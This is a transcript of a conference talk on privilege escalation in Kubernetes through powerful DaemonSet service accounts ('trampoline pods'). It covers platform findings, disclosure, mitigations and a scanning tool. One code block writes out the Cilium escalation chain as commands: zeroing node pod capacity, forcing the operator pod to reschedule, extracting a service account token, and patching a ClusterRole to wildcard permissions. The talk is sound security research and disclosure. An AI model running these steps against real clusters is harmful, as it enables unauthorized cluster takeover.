Hello everyone, let's get started so we keep the session on time. My name is Indy, I'm from Google, and I'm the moderator of this session. It's my honor to introduce Yuval from Palo Alto Networks, who will talk about Kubernetes security and trampoline pods.

Thank you. Can everyone hear me in the back? Yeah? Awesome. So, I'm Yuval Avrahami, and today we're going to talk about trampoline pods and privilege escalation in Kubernetes. I'm pretty excited, not having done a live talk in a couple of years. Joining me today was supposed to be Shaul Ben Hai. In the end he couldn't come, but he was an equal part of making this research and presentation.

A bit about Shaul and myself: we're security researchers at Prisma Cloud, Palo Alto Networks. We do vulnerability research and threat hunting in the cloud. We look for security issues in the cloud ecosystem, and we try to find the threat actors that are exploiting them. We're also NBA fans, and we made a couple of predictions for the conference finals when we made this talk. We got three out of four right, and I'm pretty happy about that.

A bit about what we'll be discussing today. We'll start off with container escapes, this threat we keep hearing about, and try to understand the real impact, the real blast radius. We'll then talk about the concept we named trampoline pods and see how they allow privilege escalation in Kubernetes in general, but also in the most popular Kubernetes platforms out there, based on a case study we've been conducting over the last couple of months. We'll then go over some recommendations on how you can address privilege escalation in Kubernetes, and we'll finish off with rbac-police, an open-source tool we're now releasing that can help you address privilege escalation.

Okay, so, container escapes. Obviously containers are great for packaging and deploying software, right? That's why we all use them. But they're not the strongest security boundary, mostly because of the shared kernel, and we can expect container escapes to keep happening. In 2022 alone we had at least six vulnerabilities, both in the kernel and in container runtimes, that would have allowed a container escape. Containers can also be escaped because of a misconfiguration; the most well-known one is privileged containers. And there are threat actors in the wild actually trying to capitalize on these issues and escape containers to spread in the victim's environment.

So if we understand that container escapes are a threat that's here to stay, it's really important to discuss their impact. In Kubernetes, the obvious impact is a compromised node. The attacker previously had access to only one pod, but now he escapes and has access to all the neighboring pods on that node, so possibly more business logic, and he also has access to more compute resources: all the CPU and memory of the node. But if we expect our attacker to be an ambitious one, he might not be satisfied with just the node; he might want to take over the entire cluster. And that's the question we're going to try to answer today: does a single container escape allow an attacker to take over the entire cluster and become cluster admin? That's going to be the guiding theme for this whole talk. Just to clarify what we mean by cluster admin: the attacker can perform every single operation in all namespaces.
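As a side note, the privileged-container misconfiguration mentioned above comes down to a single field in the pod spec. A minimal, hypothetical example (the pod and image names here are placeholders, not from the talk):

```yaml
apiVersion: v1
kind: Pod
metadata:
  name: risky-pod                            # hypothetical name
spec:
  containers:
  - name: app
    image: registry.example.com/app:latest   # placeholder image
    securityContext:
      privileged: true   # removes most container isolation:
                         # access to host devices, all capabilities, etc.
```

A pod like this is effectively one step from the node, since, for example, it can mount the host filesystem from a host device.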
So, complete control over the cluster. We're also going to use another term, admin-equivalent, meaning the attacker has a permission that within one or two trivial steps allows him to become cluster admin. In this example, it's the permission to list secrets.

In order to understand what an attacker on a compromised node can do, we need to talk about what credentials exist on a compromised node. First of all, we have the kubelet credentials. The kubelet is the node agent, and it obviously has a set of permissions that allow it to operate its node. But thankfully, Kubernetes has mostly dealt with attacks that originate from the kubelet credentials, using two components: the Node authorizer and the NodeRestriction admission plugin. What those do is make sure the kubelet can only access resources already associated with its node, for example the pods running on that node. There's actually a really good KubeCon talk from a few years ago that describes that effort. The bottom line is that the kubelet permissions, the default permissions of the node, wouldn't allow an attacker to become cluster admin. They're useful for some low-impact attacks, like reading certain objects in the cluster or launching a denial-of-service attack, but if we're asking whether a compromised node can become cluster admin, they're not that relevant.

The node also hosts a different type of credential: the service account tokens of the neighboring pods. Their permissions vary, and we really don't know them in advance; it depends on the node and on the pods it's running. The bottom line is that for an attacker, the interesting permissions are actually the pods' permissions, because the kubelet permissions will always be the same static, restricted set. Pod permissions might not be powerful at all, but they might also be very powerful.

So those are the really interesting permissions for an attacker. Today we're going to see scenarios where pods actually have a lot of permissions, where they're very powerful, and we tried to name that concept. The name we gave them is trampoline pods: pods that allow an attacker to jump around the cluster, reach higher privileges, and basically have some fun in your cluster.

Now, the obvious question is: are these kinds of pods common, and where do they come from? To answer that, we need to discuss what kinds of pods run on a typical node. Obviously you have application pods, the things you're actually running your cluster in order to host. You probably also have a bunch of add-ons, so you might be running Prometheus for monitoring, or Istio for service mesh, or OPA Gatekeeper for policy enforcement, and the list goes on. And there's another group of pods, which we named system pods; you may also hear them referred to as infrastructure pods. These are the pods that normally sit in kube-system and are already there when you create the cluster. They vary between managed services and between distributions, but common examples would be kube-proxy or CoreDNS.

If we try to understand which of those groups could be trampoline pods, could be powerful, we see that system and add-on pods are actually a bit of a blind spot permission-wise, because we don't configure their permissions. For add-ons, we normally just install a Helm chart, which configures the add-on's permissions for us; and for system pods, they were there when the cluster was created, so obviously we didn't configure their permissions.

Another interesting thing about these two sets of pods is that they often run as DaemonSets, meaning they run on every single node in your cluster. And that really matters if they're powerful. You can imagine that if a trampoline pod is not deployed as a DaemonSet, for example as a Deployment, then only specific nodes in the cluster would allow escalating privileges, and an attacker who escaped might very well not be on a node that hosts a trampoline. But with a trampoline DaemonSet, every single node in the cluster hosts powerful credentials, powerful tokens, so an attacker who escapes a container is guaranteed to find valuable credentials on the node. If we're trying to answer whether a container escape actually equals cluster admin, those are the trampolines we want to look into, because they can provide definitive answers.

Now, we kind of skimmed over a part, which is defining trampolines. We said trampoline pods are basically pods with powerful permissions, but what are powerful permissions in Kubernetes? That's a question we tried to answer in this research, and when we did, we saw that there's actually no public list of powerful permissions. That's quite surprising, because such a list is crucial for answering really important questions like: is my publicly exposed pod powerful, can it escalate privileges? Does this add-on I'm about to install come with admin-equivalent or risky permissions?

Our approach to tackle this was to first define the interesting attack classes that a given permission could carry out, the things that make it powerful, and then go over all of the permissions and try to map them to those attack classes. So let's talk about the attack classes we identified in Kubernetes that could actually be interesting.

The first is permissions that allow you to manipulate authentication or authorization, for example to change your identity or your permissions; a very obvious example would be the permission to impersonate other users. Then you have permissions that allow you to acquire service account tokens, either by retrieving an existing one or by issuing a new one. For example, the permission to list secrets allows you to retrieve existing service account tokens, which are saved as secrets. Then you have permissions that allow you to execute code, either on pods in the cluster or on nodes. For example, the permission to create pods/exec is what allows you to do kubectl exec. Then there's an attack class I'm really excited about, which is stealing pods: permissions that allow you to move an existing pod from one node to another. Why would you want to do that? If we assume we've already compromised the node, there might be interesting pods we want to bring to our node, either because they host interesting business logic or, in our case, because they host powerful permissions, a powerful service account. If we bring them over to our node, we can then exploit their service account. Finally, there's an attack class we're not going to get into too much, which is meddler-in-the-middle, also known as man-in-the-middle: permissions that allow you to intercept traffic. The reason we're not going to get into it is the impact: it's not a reliable attack. You can't reliably use man-in-the-middle in Kubernetes to escalate privileges. You might manage it, but we're looking for reliable attacks.

We looked at the permissions in Kubernetes and tried to classify them based on those attack classes. We're also going to release a report alongside this presentation which details, for each permission, how it enables the attack, but we don't really have time to go over each one of them. It's important to note that these likely aren't all of the powerful permissions, but we think it's a good start. So, back to the question of what makes a trampoline: trampoline pods are pods that have permissions to manipulate authorization or authentication, acquire service account tokens, execute code on pods or nodes, or steal pods, because those permissions give you a real shot at becoming cluster admin.

Let's do a quick recap, because we went over a couple of subjects. We started off by saying that container escapes are likely going to continue to happen, and that the main thing dictating their impact is whether a powerful pod, a trampoline, exists on the node, and we defined what a trampoline is. We also discussed how trampoline DaemonSets install powerful pods onto every single node in the cluster. So if we want to answer whether a container escape actually equals cluster admin, the questions we're asking are: are trampoline DaemonSets installed, who installs them, and how common are they?
And that's really the question we tried to answer in this research: we looked at the most popular Kubernetes platforms, trying to find trampoline DaemonSets and understand their impact on each platform. We focused mostly on infrastructure platforms, so managed Kubernetes services and distributions like EKS, GKE, AKS and OpenShift, and we also looked at container network interfaces like Calico, Cilium, Antrea and Weave Net. The idea behind this is that infrastructure components are more likely to deploy DaemonSets.

When we looked at those platforms and searched for trampoline DaemonSets, we found that most of them actually installed them: 62%, 62.5% to be exact, installed powerful DaemonSets by default. In this table you can see, for each platform, whether it installed powerful DaemonSets, which DaemonSets those were, and what their powerful permissions were. Again, there's a report with more details; we're not going to get into each platform now.

Based on those trampoline DaemonSets and their permissions, we tried to evaluate whether a container escape actually equals cluster admin in those platforms. In half of the platforms it did; in another 25% there were some prerequisites; and in the remaining 25% it didn't. This is a breakdown of whether container escape equals cluster admin in each of those platforms. You can see that we detailed each attack based on the attack classes involved in getting to cluster admin. For platforms with really powerful trampoline DaemonSets the attack is pretty short, but for ones where they were not that powerful, the attack took a few steps.

Now, a lot of you are probably using these platforms, so I just want to say there's no need to panic. There's a large prerequisite here: for an attacker to abuse a trampoline DaemonSet, they first need to take over your pod and then escape it, and there are a lot of best practices and hardening measures that can deny that. Also, a lot of the platforms I mentioned have already removed powerful permissions from their DaemonSets. That being said, if you run multi-tenant clusters you're in a different scenario, and you should really be a bit more alert about this.

Okay, so that was a lot of theory. Let's see what an attack looks like. We obviously don't have time to go over every platform and every attack, so we chose Cilium, mostly because it showcases a number of attack classes, and also because Cilium's maintainers did a great job of releasing fixes and backporting them.

So, what's the scenario with Cilium? Cilium installs two interesting components. One is the Cilium DaemonSet, a trampoline: its permissions are to delete pods and to update the status of nodes, and those two together allow you to steal pods, as we'll see in a minute. Then we have the cilium-operator Deployment, which can list secrets and thereby acquire service account tokens. In this attack we're starting from where the rest of this talk started: we've compromised a node and want to become cluster admin. Obviously we chose the weakest node, the node not hosting the cilium-operator. Our approach is to first use the Cilium DaemonSet's permissions to take over the cilium-operator, and then use its permissions to get cluster admin. I'll just take a sip of water before we start. Okay, I'm ready.

The first step in the attack is to make the other nodes unschedulable, and we do that by overriding the pod capacity in their status to zero, using the update node status permission. The second step is to delete the cilium-operator. When that happens, Kubernetes will try to reschedule it, and because all the other nodes are unschedulable, it has to land on our node. So we've successfully stolen the cilium-operator pod. The next step is to use its list secrets permission to retrieve a token for a built-in powerful service account. The service account we chose is the clusterrole-aggregation-controller, or CRAC for short, because it can manipulate permissions by modifying cluster roles. The final step is to use that CRAC token to modify our own permissions and simply grant ourselves every permission in the cluster. So again, the steps are: steal the cilium-operator, use its permissions to acquire a powerful token, and then use that powerful, admin-equivalent token to get all of the permissions in the cluster.

Now we're going to see a demo. I know those were only three steps, but when you translate them to kubectl commands it's a lot, so it's going to be quite quick. If you can't follow every command, that's okay; we'll have a walkthrough afterwards as well.

So let's start. We're in a cluster that installed Cilium, and the first thing we do is emulate a container escape. What I'm doing now is installing a script that can find service account tokens in the filesystem and configure kubectl to use a given token, just to make things a bit easier. We use that script to get the Cilium DaemonSet's token. We can verify that we're the Cilium DaemonSet, because when we attempt a forbidden operation, the error shows we're identified as the Cilium DaemonSet's service account. Let's see our target: we want to steal the cilium-operator, and we can see it's hosted on another node in the cluster, not ours.

So the first step is to steal it. How do we do that? We're going to change the pod capacity of the other nodes in the cluster to zero. We define a bash function that uses kubectl proxy to modify the status of a node with a JSON patch; you can see the operation is to replace the pod capacity, and the new value is zero. Almost there... got it. Now we use that function to set the pod capacity of the two other nodes in the cluster to zero, and we do it in a loop because Kubernetes actually keeps correcting the value. Now that the two other nodes are unschedulable, we can delete the cilium-operator, and if all goes well it should be recreated on our node. We can see that it is: the node name is highlighted in red, and it's a different pod name from the one we deleted.

The next step is to use the cilium-operator's permissions to get CRAC's token. We configure kubectl to use the cilium-operator's token, and we can see that we can now retrieve secrets in the cluster. We target the service account token secret of the clusterrole-aggregation-controller. Here I'm making a typo, so that doesn't work, but now it should... and we got the token, and we configure kubectl to use it. Now that we have the token, we can modify ClusterRoles in the cluster. We're not yet cluster admin, as you can see, but we're now going to change our own permissions: we use CRAC's token to modify the ClusterRole that is bound to the CRAC service account. As you can see, this ClusterRole can currently only escalate cluster roles, but we're going to change it a bit and make it full cluster admin as well. And now, when we check CRAC's permissions, we can see that we can do every single operation in the cluster, in all namespaces.
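Condensed, the three demo steps correspond roughly to the following commands. This is an illustrative sketch of the pre-fix behavior, not something runnable as-is: the node name, secret name, and operator pod label are my assumptions, and it presumes kubectl is configured with the appropriate stolen token at each stage:

```shell
# Step 1 (Cilium DaemonSet token): make the other nodes unschedulable by
# zeroing their pod capacity via the nodes/status subresource. Repeat in a
# loop, since Kubernetes keeps correcting the value.
kubectl proxy &
curl -s -X PATCH \
  -H 'Content-Type: application/json-patch+json' \
  -d '[{"op": "replace", "path": "/status/capacity/pods", "value": "0"}]' \
  http://127.0.0.1:8001/api/v1/nodes/<other-node>/status

# Step 2 (Cilium DaemonSet token): delete the operator; with every other
# node "full", the scheduler must recreate it on our node.
kubectl -n kube-system delete pod -l name=cilium-operator   # label assumed

# Step 3 (cilium-operator token): read the token secret of the
# clusterrole-aggregation-controller service account...
kubectl -n kube-system get secret <crac-token-secret> \
  -o jsonpath='{.data.token}' | base64 -d

# ...then (CRAC token) append a wildcard rule to the ClusterRole bound to it.
kubectl patch clusterrole system:controller:clusterrole-aggregation-controller \
  --type=json \
  -p '[{"op": "add", "path": "/rules/-", "value": {"apiGroups": ["*"], "resources": ["*"], "verbs": ["*"]}}]'
```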
So we've basically achieved our goal: from a single compromised node, we became cluster admin. Which attack classes did we just see in the demo? We started off by stealing a pod, the cilium-operator pod; we then used its permissions to acquire a powerful service account token; and finally we used that token to manipulate our authorization, our permissions, to get cluster admin. That's how the attack classes we discussed earlier map to a real attack.

Some final remarks on Cilium. Cilium actually fixed all of these issues; none of those powerful permissions remain. And obviously other platforms had similar attacks; we just needed to choose one to demo. The demo targeted the Cilium CLI installation, which was the default installation method when we looked at it, but Cilium is a special case: there's another popular installation method via Helm, and via Helm the permissions are slightly lower, so the impact is lower. I don't have time to get into that, but if you use Cilium with Helm and want to understand it, you can see our report.

So let's talk about what platforms did when we disclosed those trampoline DaemonSets to them. We disclosed our findings for every trampoline DaemonSet we found between December 2021 and February 2022, and it was really a great disclosure experience all around: all of the platforms were cooperative, understood the issue, and wanted to resolve it. The approaches platforms took to fix this are quite interesting. The first was simply to strip excessive or unneeded permissions, or to scope down certain permissions. Another approach we saw was to move functionality from DaemonSets, which run on every node in the cluster, to Deployments, which run on only a few nodes, or to the control plane in the case of managed services. And finally, a couple of platforms released admission policies, similar to OPA Gatekeeper policies, that prevent misuse of those problematic DaemonSets by scoping down the operations the DaemonSet can actually perform.

You can see there was a really good trend in just a few months, which I think speaks well to the commitment of the platforms mentioned here to resolving the issue: from 62.5%, now only 25% run trampoline DaemonSets, and a really similar thing happened with the impact of container escapes. It's worth mentioning that this covers the impact of container escapes due to Kubernetes-native attacks; if a platform has some platform-specific attacks, we didn't look into that. This is a breakdown of the fixes in each platform. One thing to mention is OpenShift: as it turned out, just by chance, they were the last platform we disclosed to, and they had a lot of things to fix, and they really did a great job with that; their fixes are going to be released in the next version. Google also gave us a bounty for this finding, which was quite nice of them.

So let's talk about what you can do to address this kind of privilege escalation, whether you're a Kubernetes user running your own clusters or a maintainer of a Kubernetes project, because obviously we didn't cover the many other projects that people commonly install into their clusters. First of all, follow the principle of least privilege: when you can, try to scope permissions to specific namespaces or to specific resource names. It's really worth taking a look at your Kubernetes manifests and your Helm charts to see what permissions you're asking for. A lot of the time, when we're just starting a project or a deployment, we grant broad permissions just to make sure everything works, and those stay as legacy even though they're not needed.

It's really important to understand your RBAC posture if you run Kubernetes: you should be able to say which pods in your cluster are powerful, which ones can actually escalate privileges. If you maintain a Kubernetes project, it would be great if you could document the powerful permissions you're installing into a cluster. Once you've identified the powerful pods in your cluster, if they don't run as DaemonSets, it's best practice to isolate them from publicly exposed or untrusted pods, and there are a couple of scheduling mechanisms you can use to do that.

Now, on to trampoline DaemonSets: we saw how they degrade the security of a cluster, so when you can, try to remove them. You can move privileged functionality from DaemonSets to non-DaemonSet components of your platform or cluster, or to the control plane if you control the control plane. You can also minimize write permissions on core objects like pods and nodes by storing state in ConfigMaps or CRDs. And it's not a question of dropping everything or dropping nothing: drop the permissions you can. It's still much better if a DaemonSet that could previously acquire tokens can now only launch man-in-the-middle attacks; it's a step-by-step process. Finally, when some permissions are hard to remove, you can use admission policies to scope down what a certain DaemonSet can do. We have more data and examples for that in our report.

Okay, so we discussed what to do when you want to address powerful permissions. But when we looked at this issue, we found it's quite hard to identify powerful permissions in a cluster; there aren't a lot of automated tools. So we wrote one, and we named it rbac-police. What rbac-police does is retrieve the permissions of the pods, service accounts and nodes in your cluster, and then evaluate them against policies written in Rego. Out of the box we have around 20 policies, covering each of the powerful permissions we mentioned, so you can simply run rbac-police and see which pods in your cluster are powerful. But it's also customizable: you can search for any pattern you'd like in Kubernetes RBAC. Here's an example of what the output looks like: this is the Cilium cluster we just saw, and it shows that Cilium can actually modify pods, alerting on the specific service accounts and the specific pods in the cluster that are powerful. I really recommend trying it; it takes a couple of seconds and gives you a lot of insight into your RBAC posture.

Some final thoughts. The bright side is that these issues are getting harder to exploit. A few years ago, issues were not complex to exploit and had a lot of impact; here, you can see there's a big prerequisite of compromising a node first. The one downside, though, is that this can create false confidence: you might have a cluster that passes all of the CIS benchmarks, all of the best-practice benchmarks, and not be aware that you're a single container escape away from your whole cluster being compromised. One way to address these kinds of issues is to tackle vague areas in Kubernetes security. We tried to do that in this talk for two questions we felt didn't have good answers: which permissions are actually powerful, and what's the real impact of a container escape? The main point is that Kubernetes is complex enough that, when we can, we should research these types of issues and try to document them and make their impact public. So with that, here's a link to our report, here's a link to rbac-police, and I'll be happy to take any questions. Thank you.
Well, yeah, thank you for your discovery. I think our team was busy the last couple of months fixing all the issues. Here are a couple of questions from the online Q&A. The first one is: why does the multi-tenant scenario increase the chance that an escape equals admin?

That's a good question. It doesn't really increase the chance that a container escape equals cluster admin, but it does increase the chance of container escapes, because there's more of a chance that you have a malicious tenant, for example. That's what I meant by that. And the other question... oh yeah, the other question I can answer: the report link is on the screen right now, so you can scan it.

Another question: so the least-privilege paradigm still needs more attention. To raise the bar a little bit, do you think a zero-privilege implementation is feasible for Kubernetes?

That's a really good question. I don't think we can reach a situation where, for example, no node in the cluster hosts powerful credentials, but we can definitely arrive at a point where most nodes in the cluster don't host powerful privileges, and that's really what we're driving at here. The opposite of that is the current situation, where in a lot of clusters every node has powerful credentials on it, and that's really not good for your security.

Yeah, so thank you. I think we can take some questions from the room.

Thanks. Roman Prokofiev here. I have a question about this rbac-police. As you showed, it reports some dangerous permissions, some bad stuff that could happen to the cluster, but they're already in the cluster, right? We've been discussing here with colleagues whether it's possible to integrate it with some sort of pipeline, to find out if these permissions would appear in the cluster after some change. For instance, we have lots of pipelines for different Helm charts. It would be nice to know that some helm upgrade would cause bad permissions to appear in the chart, without actually having them applied.

That's an awesome question. We actually discussed the same thing; we had it in the presentation earlier but didn't really have time to get to it. There's Checkov, an open-source IaC scanner that can scan for misconfigurations, and we just contributed a couple of RBAC policies to it, and we expect to contribute more in the future. So we're aiming to use that tool to tackle the issue you presented: finding powerful permissions before they're deployed to the cluster.

Hey, oh, hi. I'm Jeff from extension DevOps in the UK. Just got a question, it might be a bit simple: how effective would it be to just completely lock down your networking within the cluster, and only enable pod-to-pod communication through network policies?

So you mean locking down the communication between nodes, is that it?

Oh, I just meant between pods. So if you completely lock down your pod, and someone uses it as a trampoline pod but can't technically network out... but then, I guess, maybe you're talking about accessing the node's networking, and I missed that.

Thanks. I'm not sure I heard everything, but if I understood correctly, you're asking about locking down networking between pods. Most of these attacks are actually carried out from the compromised node to the API server, and that line of communication is essential, so there isn't much you can do about that. But obviously, locking down external networking, and locking down pod-to-pod communication when it's not needed, could help prevent the initial compromise.

Hi, hello. I'm working on adding user namespaces support to the kubelet, and I was wondering: if most pods, or at least the compromised pod, run in a user namespace, and every pod on the host runs as a different UID in the host namespace, would it still be possible to compromise the service account tokens, given you cannot read them under a different UID? Would that help in this case?

That's a really good question. Obviously user namespaces help a lot with container isolation, so their job would be to prevent the container escape in the first place. Then again, I wouldn't rely only on user namespaces; but if you have a more powerful sandboxing solution, say Kata Containers or gVisor, which sandbox to a higher degree, then it's less problematic to have powerful pods next to, say, publicly exposed ones. It's still not perfect, but to your question: yes, user namespaces obviously do help with container isolation.

Hi, I was wondering about two potential mitigations, one of them a possible design. First, would something like Talos, a very minimal node with no shell, help against this attack? And second, if in Kubernetes service accounts were a separate resource from secrets, can you see that offering any benefit against these types of attacks?

So I think there were two questions: one about removing binaries from the node, removing the shell, and the second about service account tokens not being secrets, is that right? I'll actually start with the second question. There's a Kubernetes enhancement that just landed in 1.24 where service account tokens are no longer automatically created as secrets for new service accounts. That obviously reduces the impact of one powerful permission, the list secrets permission. But you should know that, I don't think that until 1.26, existing service account tokens will be removed from secrets. For your question about removing binaries from nodes: it's good hardening, but I don't think it can stop this completely, and I think it's also a bit hard to implement. That said, I think a locked-down node is definitely interesting to look into for the future, and I know AWS tries to do something like that with Bottlerocket, for example.

Yeah, thank you. I think we're right out of time. If you have more questions, feel free to email Yuval, and you can connect with him through the KubeCon platform. Thank you, let's give him another round of applause.